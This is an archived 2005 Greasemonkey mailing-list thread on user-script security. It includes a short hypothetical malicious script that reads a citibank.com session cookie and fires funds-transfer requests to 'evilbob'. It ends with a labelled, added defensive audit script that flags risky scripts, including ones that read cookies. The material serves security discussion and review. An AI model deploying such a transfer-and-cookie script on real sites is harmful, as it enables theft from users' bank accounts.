Fwd: [Greasemonkey] GM is great, but Security questions - yet again

Aaron Boodman zboogs at gmail.com
Tue Apr 5 12:23:35 EDT 2005


Ugh. Forgot to actually CC alex. I think that typing it into the text
of the message ought to be enough :).

---------- Forwarded message ----------
From: Aaron Boodman <zboogs at gmail.com>
Date: Apr 1, 2005 2:47 PM
Subject: Re: [Greasemonkey] GM is great, but Security questions - yet again
To: greasemonkey at mozdev.org


[cc'ing my friend alex, who is really smart about this stuff]

Since nobody is being specific about scenarios, I guess I will volunteer one:

@include *citibank.com/*

var sessionid = document.cookie.match(/SESSION=(\d+)/)[0];

GM_xmlhttpRequest({
  method:"get",
  url:"transferRequest.cgi?to=evilbob&acct=33423212039482",
  onload:function(details) {
    confirmTransfer(details.responseText);
  }
});

function confirmTransfer(confirmPageText) {
  var amount = confirmPageText.match(/balance: $(\d+)/)[0];
  GM_xmlhttpRequest({
    method:"get",
    url:"confirmTransfer.cgi?amount=" + amount,
    onload:function(details) {
      alert("Thanks for your money, chump!");
    }
  });
}

What do you think, Alex? Is this a valid scenario? Is the ability
to parse the response a significant improvement over before? Will a
community rating system combined with what I describe here:

http://greaseblog.blogspot.com/2005/03/and-now-for-something-less-snarky.html

Let's be specific.

--
Aaron

On Apr 1, 2005 1:15 PM, Edward Lee <edilee at gmail.com> wrote:
> On Apr 1, 2005 2:04 PM, Jeremy Dunck <jdunck at gmail.com> wrote:
> > Actually, any page can do that using IFrame and form post.  There's
> > nothing new about cross-domain requests.  GM_xmlhttpRequest just makes
> > it more convenient.   An evil person would not be stopped by the
> > IFrame speedbump.
>
> Well, if you're talking about something I did before with IFrames and
> POST requests.. the communication is still just 1 way. I suppose you
> could still do "evil" things relating to sending information, but a
> script cannot access the contents of the IFrame if it's in another
> domain. XMLHttpRequests returns a responseText/XML which can be
> analyzed, parsed, executed, etc.
>
> Kinda sounds like an idea I had earlier ;) Dynamic user.js files based
> on user input/login that use GM_xmlhttpRequests to get more
> information from the server for more dynamic scripting. Hrmm.. even
> more interesting is that the remote dynamic script returned from the
> xmlrequest could have the user script make more GM_xmlhttpRequests.
>
> --
> Ed
> _______________________________________________
> Greasemonkey mailing list
> Greasemonkey at mozdev.org
> http://mozdev.org/mailman/listinfo/greasemonkey
>
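
Added example, not part of the original thread and not Greasemonkey's own code: a pre-install review aid that flags the combination the scenario above depends on, an @include that covers a sensitive site together with GM_xmlhttpRequest and access to the response. The sample script, the placeholder host bank.example.com, the SENSITIVE_HOSTS watch list and the function names are all constructed for illustration.

```javascript
// Added example: static pre-install review of a user script. Not Greasemonkey's own code.
// Constructed, defanged sample: placeholder host, no transfer logic.
const SAMPLE = [
  "// ==UserScript==",
  "// @name     Handy page tweaks",
  "// @include  *bank.example.com/*",
  "// ==/UserScript==",
  "var sid = document.cookie;",
  "GM_xmlhttpRequest({ method: 'get', url: 'summary.cgi',",
  "  onload: function (d) { show(d.responseText); } });",
].join("\n");

// Hypothetical watch list: hosts the reviewer treats as sensitive.
const SENSITIVE_HOSTS = ["bank.example.com"];

// Collect @include patterns, with or without a leading "//".
function parseIncludes(source) {
  return Array.from(source.matchAll(/^\s*(?:\/\/\s*)?@include\s+(\S+)/gm), m => m[1]);
}

// Greasemonkey globs use "*" for any run of characters; everything else is literal.
function globToRegExp(glob) {
  const literal = glob.replace(/[.+?^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + literal.replace(/\*/g, ".*") + "$");
}

function auditUserScript(source, sensitiveHosts) {
  const includes = parseIncludes(source);
  const findings = [];
  const scoped = includes.filter(glob =>
    sensitiveHosts.some(host => globToRegExp(glob).test("https://" + host + "/")));
  if (scoped.length > 0) findings.push("sensitive-scope");
  // Request plus response access is the two-way channel an IFrame POST lacks.
  const sendsRequest = /\bGM_xmlhttpRequest\s*\(/.test(source);
  const readsResponse = /\.response(Text|XML)\b/.test(source);
  if (sendsRequest) findings.push("cross-domain-request");
  if (sendsRequest && readsResponse) findings.push("reads-response");
  if (/\bdocument\.cookie\b/.test(source)) findings.push("reads-cookie");
  const high = scoped.length > 0 && sendsRequest && readsResponse;
  return { includes, findings, risk: high ? "high" : findings.length ? "review" : "low" };
}

console.log(auditUserScript(SAMPLE, SENSITIVE_HOSTS));
```

String matching like this is only a triage aid for a human reviewer or a rating system; a script that builds its calls dynamically will not be caught by it.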

